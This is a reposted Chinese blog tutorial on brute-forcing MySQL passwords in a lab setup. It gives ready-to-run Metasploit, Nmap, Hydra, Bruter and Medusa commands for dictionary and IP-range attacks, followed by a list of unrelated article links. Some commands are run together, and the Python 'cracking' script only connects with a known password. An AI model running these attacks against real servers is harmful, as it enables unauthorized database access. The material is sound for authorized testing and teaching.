博客
关于我
MySQL口令扫描渗透测试攻略
阅读量:192 次
发布时间:2019-02-28

本文共 2320 字,大约阅读时间需要 7 分钟。

MySQL数据库渗透测试工具实践指南

在信息安全领域,MySQL数据库的安全性是一个重要的防护点。通常情况下,数据库不会提供对外连接,严格的安全设置会限制仅允许从特定IP或本机登录。然而,渗透测试的核心在于发现这些例外。为了提高渗透测试效率,本文将基于现有的主流MySQL口令扫描工具,提供实际操作场景的具体命令和步骤。


1. 测试环境

  • 操作系统:Windows 2003 Server
  • 软件组合:PHP + MySQL 5.0.90-community-nt
  • 工具:Kali Linux 2017(主流渗透工具集合)+ Windows 2003

2. 账号设置

为了允许远程访问,将 MySQL 的 host 设置为 %,并设置默认口令为 11111111

MySQL 配置文件示例my.ini):

[mysql]bind-address = *

3. 测试目标

  • 目标服务器:192.168.157.130
  • 数据库用户:root
  • 默认口令:11111111

1.1 Metasploit 扫描 MySQL 口令

Metasploit 是一款功能强大的渗透测试框架,支持多种数据库扫描模块。

启动 Metasploit 命令

在 Kali Linux 终端中运行:

msfconsole

使用 Metasploit 扫描 MySQL 口令

  • 单一模式扫描
    use auxiliary/scanner/mysql/mysql_loginset rhosts 192.168.157.130set username rootset password 11111111run
  • 字典模式扫描
    use auxiliary/scanner/mysql/mysql_loginset RHOSTS 192.168.157.130set pass_file "/root/top10000pwd.txt"set username rootrun

扫描结果将显示绿色 + 符号表示成功破解的口令,红色 - 表示未成功。


1.2 Nmap 扫描 MySQL 口令

Nmap 是一款多功能网络扫描工具,支持 MySQL 相关脚本。

####MySQL 脚本示例查看 Nmap 的 MySQL 脚本路径:

ls /usr/share/nmap/scripts/mysql*

执行扫描

  • 扫描空口令
    nmap -p 3306 --script=mysql-empty-password.nse 192.168.157.130
  • 扫描已知口令
    nmap -sV --script=mysql-databases --script-args dbuser=root,dbpass=11111111 192.168.157.130

1.3 xHydra 和 Hydra 破解 MySQL 口令

Hydra 是一款功能强大的密码暴力破解工具,支持 MySQL 协议。

使用 xHydra

  • 打开 Kali 的 xHydra 图形界面工具:
    xhydra-gtk
  • 设置目标地址和协议:
    • 目标:单一目标或 IP 段
    • 协议:选择 MySQL
  • 破解命令示例

    • 已知口令破解
      hydra -l root -p 11111111 -t 16 192.168.157.130 mysql
    • 字典模式破解
      hydra -l root -P /root/top10000pwd.txt -t 16 192.168.157.130 mysql

    1.4 Bruter 破解 MySQL 口令

    Bruter 是一款支持多种协议的暴力破解工具,简单易用。

    破解命令

    • 单一用户破解
      brute -l root -p 11111111 -t 16 192.168.157.130
    • 字典模式破解
      brute -l root -P /root/top10000pwd.txt -t 16 192.168.157.130

    1.5 Medusa 破解 MySQL 口令

    Medusa 是一款支持并行破解的高效工具,适合大规模攻击。

    破解命令

    • 字典模式破解
      medusa -M mysql -h 192.168.157.130 -e ns -F -u root -P /root/top10000pwd.txt
    • IP 段模式破解
      medusa -M mysql -H host.txt -e ns -F -u root -P /root/top10000pwd.txt

    1.6 Python 脚本破解 MySQL

    编写一个简单的 Python 脚本进行 MySQL 破解:

    import MySQLdb# 例如:破解本地数据库db = MySQLdb.connect(host="localhost", user="root", passwd="11111111")print("用户名:root,密码:11111111")db.close()

    1.7 工具总结

    • Metasploit:综合性工具,适合复杂场景。
    • Hydra/xHydra:支持多地址和字典模式破解。
    • Bruter:简单易用,适合快速验证。
    • Medusa:高效并行破解,适合大规模攻击。

    1.8 最佳实践

    • 多地址模式:如果目标是多个 IP 或子网,使用 RHOSTSH 参数。
    • 字典模式:对于长密码或复杂口令,使用字典文件加快扫描速度。
    • 并行模式:Hydra 和 Medusa 支持并行破解,提升效率。

    通过以上方法,可以有效地测试和破解 MySQL 数据库的口令。实际操作中,结合目标环境和风险评估,灵活选择最适合的工具和参数。

    转载地址:http://nfgc.baihongyu.com/

    你可能感兴趣的文章
    Node出错导致运行崩溃的解决方案
    查看>>
    Node响应中文时解决乱码问题
    查看>>
    node基础(二)_模块以及处理乱码问题
    查看>>
    node安装及配置之windows版
    查看>>
    Node实现小爬虫
    查看>>
    Node提示:error code Z_BUF_ERROR,error error -5,error zlib:unexpected end of file
    查看>>
    Node提示:npm does not support Node.js v12.16.3
    查看>>
    Node搭建静态资源服务器时后缀名与响应头映射关系的Json文件
    查看>>
    Node服务在断开SSH后停止运行解决方案(创建守护进程)
    查看>>
    node模块化
    查看>>
    node环境下使用import引入外部文件出错
    查看>>
    node编译程序内存溢出
    查看>>
    Node读取并输出txt文件内容
    查看>>
    node防xss攻击插件
    查看>>
    noi 1996 登山
    查看>>
    noi 7827 质数的和与积
    查看>>
    NOI2010 海拔(平面图最大流)
    查看>>
    NOIp2005 过河
    查看>>
    NOIP2011T1 数字反转
    查看>>
    NOIP2014 提高组 Day2——寻找道路
    查看>>